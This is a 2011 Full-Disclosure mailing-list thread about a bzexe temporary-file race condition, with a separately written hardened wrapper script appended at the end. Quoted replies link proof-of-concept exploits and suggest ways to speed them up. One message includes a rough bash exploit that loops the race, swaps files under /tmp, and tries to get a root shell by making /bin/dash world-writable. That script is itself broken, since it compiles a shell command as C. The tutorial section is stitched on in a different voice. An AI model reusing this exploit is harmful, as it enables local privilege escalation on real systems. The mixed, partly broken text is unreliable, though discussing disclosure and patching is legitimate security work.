Nice :) I have put a post about this whole thread on www.crazycoders.com, will add this and props for those involved now :) Thanks to you, bugs and the others who were involved. Also realise that I have now found that bzexe = bzip2 src code, so looking on Debian/Ubuntu and CentOS, there is a bzexe or bzip2 on every box... Luckily this issue is patched for both bzip2 and bzexe, but know that it is even still being tested now against bunzip2, on decompressions, but has not been done; only know that the src is the same as the bzip2 executable binary (Linux). Again, thanks to everyone involved, it got patched within a day which is what was the aim... Ubuntu is a little safer ;s cheers. xd
On 7 November 2011 03:54, vladz <[email protected]> wrote:
>
> Hi!
>
> It's raining here, so I finally wrote a PoC for the bzexe issue:
>
> http://vladz.devzero.fr/other/bzexe_PoC.c.html
>
> It always succeeds on my Dual-core.
>
> Cheers,
> vladz.
>
>
> On Fri, Oct 28, 2011 at 11:43:56AM +1100, xD 0x41 wrote:
>> I just did a quick write of it, I think this is right anyhow.. I ain't
>> the greatest of bash/exploit coders in bash but I did try, and I
>> kinda had it almost the same, but for one line, the while.. I guess that
>> does it, well. Here is an example I guess, if we were to use gcc and
>> make a binary called 'bad' properly.. I assume this would be the
>> way... 8
>>
>>
>> #!/bin/sh
>> cd /tmp
>> cat > /tmp/bad.c << EOF
>> chmod 777 /bin/dash
>> EOF
>> gcc /tmp/bad.c -o /tmp/bad
>> while (true) do ./bz.sh ; done
>> #!/bin/bash
>> if [ -a /tmp/bash/gztmp* ]
>> then
>> echo "[+] Exploting .."
>> mv /tmp/bash /tmp/bash.dir
>> cp /tmp/bad /tmp/dash
>> echo "[!] Got dash rootshell in: /tmp/dash .."
>> ./dash
>> ls -l /tmp/dash
>> while (true) do ./bz.sh ; done
>> whoami
>> id
>> su
>> fi
>>
>> I think this would be kinda close?
>> I don't expect this to go onto public domain AT ALL, so please, I'll
>> respect your privacy but you also respect mine ok :)
>> I like you, you're a great guy, and awesome for taking the challenge,
>> where even the strongest, like taviso, and kcope even, left in your
>> wake... and even I am a bit shocked but am going to try and put it
>> into practice... the .c bzexe doesn't really do it for me :P but yes,
>> I did change it a little so it at least echoes across a tmp bin/sh or
>> so I think it needs.. then again, it might not need anything, but I
>> know these PoCs won't get people a rootshell unless we show them, so I
>> guess as long as these kinda emails stay pvt, it's all good.
>> I have a lot of bugs in the bash area, and I discuss a lot with some
>> members of the list even on my irc channel on efnet #haxnet, and
>> there are ALL the exploit coders from FD probably, phrack and more
>> groups, core, kcope, and rapid7, all them other smaller secteams seem to
>> lurk also, from a 3 user channel about 1 year ago, simply speaking
>> about PoCs made and their worth.
>> I guess it is good to see and then to prioritise, as Debian have done
>> now, with the bzexe :)
>> See, it would have probably remained nothing done for god knows, if you
>> had not taken the challenge up, and I can't believe you did it with a
>> shitty 500mhz! LOL, I am looking at about 4 of those atm on my floor,
>> I did a trade-in offer, p3 for p4 for 50bux, and I was after that
>> exact celeron and pentium 500mhz p3 cores, they're very good when
>> played with and my gear's all rack.
>> Anyhow, I would love to chat with you, you use irc?
>> If so, I'd love to catch up and have a chat anytime :)
>> If you're in Australia, well heck come over for a coffee buddy!
>> Have a great day, and if you can fix this to make a rootshell, well,
>> it should make it anyhow but, just in case, I guess this is my own
>> collection, and I have like 6 sh files, which between them, get all
>> 2011 and earlier, and it is really scary because there is NO way to
>> exploit them, if using .c ... Anyhow, thank you very much, and I and
>> the secworld owe you a big thanks :)
>> I only wish they credited ppl like me, who try to inspire... lol, I
>> guess I am like one of those dodgy football managers who sleeps with
>> pros and stuff... hehe... kept in the back... for the sake of
>> sanity.
>> lol... have a good one mate!
>> xd / crazycoders.com (I will soon make an article and a complete patch
>> solution etc., when it has a patch available, of course then
>>
>> PS: I will post it in one big PoC details with solution and patch
>> attached to the posting etc... I don't like to publish things which are
>> not at least being patched.... so, I guess, enjoy!
>>
>>
>> On 28 October 2011 04:34, vladz <[email protected]> wrote:
>> >
>> >
>> > On Thu, Oct 27, 2011 at 05:01:30PM +0200, Benjamin Renaut wrote:
>> >> http://pastebin.com/FaaEsXRW
>> >
>> > Nice thing, but for sure, it can be optimized.
>> >
>> > For example, to save time, I would suggest you to use rename() instead
>> > of using both unlink() and rmdir() functions. Same thing for your
>> > write_shellcode() function, it contains too many calls. It would be
>> > preferable to create your nasty shell script first, and then (when it's
>> > time), rename() it as dirname.
>> >
>> > Cheers,
>> > --
>> > http://vladz.devzero.fr
>> > PGP key 8F7E2D3C from pgp.mit.edu
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>
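For the patch side of this thread (a bzexe-style self-extractor that unpacks into a guessable /tmp path such as /tmp/bash/gztmp*), here is an added example of the scratch-directory handling a hardened wrapper should use; it is not code from the thread, from bzip2 or from Debian's fix. The function names make_private_tmpdir, verify_private_file and run_payload_safely are my own, and the block assumes mktemp -d (coreutils) and bzip2 are installed.

```shell
#!/bin/sh
# Hardened scratch-dir handling for a bzexe-style self-extracting script.
# Assumptions: mktemp -d (coreutils) and bzip2 are present; function names are ours.

# Create a private, unpredictable scratch directory and print its path.
# Returns 1 rather than falling back to a guessable name such as /tmp/bash.
make_private_tmpdir() {
  dir=$(mktemp -d "${TMPDIR:-/tmp}/bzexe.XXXXXXXX") || return 1
  # A symlink or a non-directory at this path means we did not create it.
  if [ -L "$dir" ] || [ ! -d "$dir" ]; then
    return 1
  fi
  chmod 700 "$dir" || return 1
  printf '%s\n' "$dir"
}

# Succeed only for a regular, non-symlink file that nobody else can write:
# a self-extractor must not execute anything that fails this check.
verify_private_file() {
  if [ -L "$1" ] || [ ! -f "$1" ]; then
    return 1
  fi
  # First field of ls -l: type + rwx bits; columns 6 and 9 are group/other write.
  case $(ls -ld -- "$1" | cut -c1-10) in
    -????-??-?) return 0 ;;
    *) return 1 ;;
  esac
}

# Decompress $1 into the private directory, re-check the result, run it,
# and always remove the directory afterwards.
run_payload_safely() {
  dir=$(make_private_tmpdir) || return 1
  trap 'rm -rf "$dir"' EXIT INT TERM
  # Fixed output name under a directory only we can enter: no glob over
  # /tmp/*/gztmp* and no window in which another user can swap the file.
  bzip2 -dc -- "$1" > "$dir/prog" || return 1
  chmod 700 "$dir/prog" || return 1
  verify_private_file "$dir/prog" || return 1
  "$dir/prog"
}
```

Call run_payload_safely with the path of a bzip2-compressed executable; the wrapper refuses to run anything it did not create itself in a directory it owns.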
